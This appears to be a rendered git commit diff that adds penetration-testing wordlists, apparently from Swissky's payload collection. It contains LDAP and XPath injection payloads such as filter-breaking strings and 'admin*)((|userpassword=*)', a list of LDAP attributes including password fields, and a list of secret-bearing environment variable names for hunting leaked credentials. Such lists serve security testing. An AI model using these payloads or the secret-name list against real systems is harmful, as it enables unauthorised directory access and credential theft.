encrypted_1db1f58ddbaf_iv=
|
||||
WATSON_CONVERSATION_WORKSPACE=
|
||||
WATSON_CONVERSATION_USERNAME=
|
||||
WATSON_CONVERSATION_PASSWORD=
|
||||
SOUNDCLOUD_USERNAME=
|
||||
SOUNDCLOUD_PASSWORD=
|
||||
SOUNDCLOUD_CLIENT_SECRET=
|
||||
SOUNDCLOUD_CLIENT_ID=
|
||||
SDM4=
|
||||
PARSE_JS_KEY=
|
||||
PARSE_APP_ID=
|
||||
NON_MULTI_WORKSPACE_SID=
|
||||
NON_MULTI_WORKFLOW_SID=
|
||||
NON_MULTI_DISCONNECT_SID=
|
||||
NON_MULTI_CONNECT_SID=
|
||||
NON_MULTI_BOB_SID=
|
||||
NON_MULTI_ALICE_SID=
|
||||
MULTI_WORKSPACE_SID=
|
||||
MULTI_WORKFLOW_SID=
|
||||
MULTI_DISCONNECT_SID=
|
||||
MULTI_CONNECT_SID=
|
||||
MULTI_BOB_SID=
|
||||
MULTI_ALICE_SID=
|
||||
GHB_TOKEN=
|
||||
GCR_USERNAME=
|
||||
GCR_PASSWORD=
|
||||
BROWSERSTACK_USE_AUTOMATE=
|
||||
AUTH_TOKEN=
|
||||
0NC6O0ThWq69BcWmrtbD2ev0UDivbG8OQ1ZsSDm9UqVA=
|
||||
&query=
|
||||
xsixFHrha3gzEAwa1hkOw6kvzR4z9dx0XmpvORuo1h4Ag0LCxAR70ZueGyStqpaXoFmTWB1z0WWwooAd0kgDwMDSOcH60Pv4mew=
|
||||
username=
|
||||
ted_517c5824cb79_iv=
|
||||
s3_secret_key=
|
||||
s3_access_key=
|
||||
n8awpV01A2rKtErnlJWVzeDK5WfLBaXUvOoc=
|
||||
encrypted_f383df87f69c_key=
|
||||
encrypted_f383df87f69c_iv=
|
||||
encrypted_997071d05769_key=
|
||||
encrypted_997071d05769_iv=
|
||||
encrypted_671b00c64785_key=
|
||||
encrypted_671b00c64785_iv=
|
||||
encrypted_3761ed62f3dc_key=
|
||||
encrypted_3761ed62f3dc_iv=
|
||||
branch=
|
||||
_8382f1c42598_iv=
|
||||
_02ddd67d5586_key=
|
||||
YANGSHUN_GH_PASSWORD=
|
||||
Y8=
|
||||
XJ7lElT4Jt9HnUw=
|
||||
VIP_TEST=
|
||||
USE_SSH=
|
||||
SOMEVAR=
|
||||
PROD_USERNAME=
|
||||
PROD_PASSWORD=
|
||||
ORG_GRADLE_PROJECT_cloudinary.url=
|
||||
N=
|
||||
LOGNAME=
|
||||
I6SEeHdMJwAvqM6bNXQaMJwJLyZHdAYK9DQnY=
|
||||
HAB_KEY=
|
||||
HAB_AUTH_TOKEN=
|
||||
GPG_EXECUTABLE=
|
||||
GK_LOCK_DEFAULT_BRANCH=
|
||||
GIT_USER=
|
||||
F97qcq0kCCUAlLjAoyJg=
|
||||
DB_USERNAME=
|
||||
DB_PASSWORD=
|
||||
DB_DATABASE=
|
||||
DB_CONNECTION=
|
||||
CONEKTA_APIKEY=
|
||||
CLAIMR_DB=
|
||||
BROWSERSTACK_BUILD=
|
||||
AiYPFLTRxoiZJ9j0bdHjGOffCMvotZhtc9xv0VXVijGdHiIM=
|
||||
ANALYTICS=
|
||||
A=
|
||||
?account=
|
||||
6mSMEHIauvkenQGZlBzkLYycWctGml9tRnIpbqJwv0xdrkTslVwDQU5IEJNZiTlJ2tYl8og=
|
||||
1ewh8kzxY=
|
||||
0KNAME=
|
||||
-e=
|
||||
&password=
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,46 @@
|
|||
*
|
||||
*)(&
|
||||
*))%00
|
||||
*()|%26'
|
||||
*()|&'
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*)(uid=*))(|(uid=*
|
||||
*/*
|
||||
*|
|
||||
/
|
||||
//
|
||||
//*
|
||||
@*
|
||||
|
|
||||
admin*
|
||||
admin*)((|userpassword=*)
|
||||
admin*)((|userPassword=*)
|
||||
x' or name()='username' or 'x'='y
|
||||
!
|
||||
%21
|
||||
%26
|
||||
%28
|
||||
%29
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
%7C
|
||||
&
|
||||
(
|
||||
)
|
||||
)(cn=))\x00
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*/*
|
||||
*|
|
||||
/
|
||||
//
|
||||
//*
|
||||
@*
|
||||
x' or name()='username' or 'x'='y
|
||||
|
|
||||
*()|&'
|
||||
admin*
|
||||
admin*)((|userpassword=*)
|
||||
*)(uid=*))(|(uid=*
|
|
@ -0,0 +1,27 @@
|
|||
c
|
||||
cn
|
||||
co
|
||||
commonName
|
||||
dc
|
||||
facsimileTelephoneNumber
|
||||
givenName
|
||||
gn
|
||||
homePhone
|
||||
id
|
||||
jpegPhoto
|
||||
l
|
||||
mail
|
||||
mobile
|
||||
name
|
||||
o
|
||||
objectClass
|
||||
ou
|
||||
owner
|
||||
pager
|
||||
password
|
||||
sn
|
||||
st
|
||||
surname
|
||||
uid
|
||||
username
|
||||
userPassword
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,21 @@
|
|||
MIT License
|
||||
|
||||
Copyright (c) 2019 Swissky
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
File diff suppressed because one or more lines are too long
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue